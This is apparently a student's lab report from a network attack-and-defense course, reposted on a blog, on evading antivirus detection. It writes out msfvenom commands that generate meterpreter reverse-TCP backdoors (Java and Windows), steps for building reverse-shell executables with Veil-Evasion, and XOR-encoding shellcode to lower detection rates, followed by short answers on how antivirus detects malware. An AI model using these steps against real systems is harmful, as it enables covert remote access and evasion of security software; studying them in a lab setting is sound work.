20155210 网络攻防技术 实验三 免杀原理与实践

网络攻防技术 实验三 免杀原理与实践

使用msf生成后门程序的检测

  • 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测

如图:
1071475-20180409095609656-821115616.png

  • 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.35.132(kali ip) lport=5210 x> 5210_backjar.jar,生成jar文件,进行检测。

如图:
1071475-20180409101947500-2090427828.png

检测结果:
1071475-20180409103902588-315024246.png

如图可知jar文件,免杀能力较强

使用veil-evasion生成反弹链接的可执行文件

  • 首先我们先对veil-evasion进行安装,详情可参考老师博客

  • 安装好之后,我们利用veil,指令打开veil-evasion

  • 依次用use evasionlist payloads,进入到payloads模板界面

如图:
1071475-20180409104716043-1806755845.png

  • 随便选择一个模板,将其复制,输入q退回到上一界面,然后输入use xxxxx(你所复制的模板)

  • 然后输入set LHOST kali-ipset LPORT 5210对其进行配置,然后输入generate,生成。

如图:
1071475-20180409105020751-989159272.png

  • 生成后如图:
    1071475-20180409105423477-348068818.png

  • 记录下exe文件的位置,将其拖到windows下进行检测,结果如图:

1071475-20180409105525539-258718402.png

利用shellcode编程实现免杀

  • 首先我们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.132 LPORT=443 -f c

如图:
1071475-20180409105838548-1465371461.png

  • 根据老师所给的,将其变成C语言文件,进行编译

如图:
1071475-20180409113411999-1801470226.png

  • 进行回连,回连成功

如图:
1071475-20180409113448942-1765764143.png

  • 进行检测,如图:
    1071475-20180409114250841-693059635.png

对shellcode进行更改

  • 我首先对其进行异或,我做的为异或\x10
    如图:
    1071475-20180409123343049-1384685473.png
  • 回连成功
    如图:
    1071475-20180409123429036-1320087362.png

  • 进行检测,如图:
    1071475-20180409123543407-1780410347.png

加壳

加壳会起到反作用,原本为后门程序,加壳后会让杀毒软件认成木马。

基础问题

  • 杀软是如何检测出恶意代码的?

  • 1.基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

  • 2.基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。

  • 免杀是做什么?

免杀是将二进制码隐藏,或者变形

  • 免杀的基本方法有哪些?

1.改变特征码

2.对exe可执行文件加壳:压缩壳 加密壳

3.基于payload重新编译生成可执行文件

实验总结

我再次进行尝试,检查helloworld的C语言代码,结果如图

1071475-20180409125556988-31587618.png

有两个会提示木马。

转载于:https://www.cnblogs.com/panyinghao/p/8758291.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值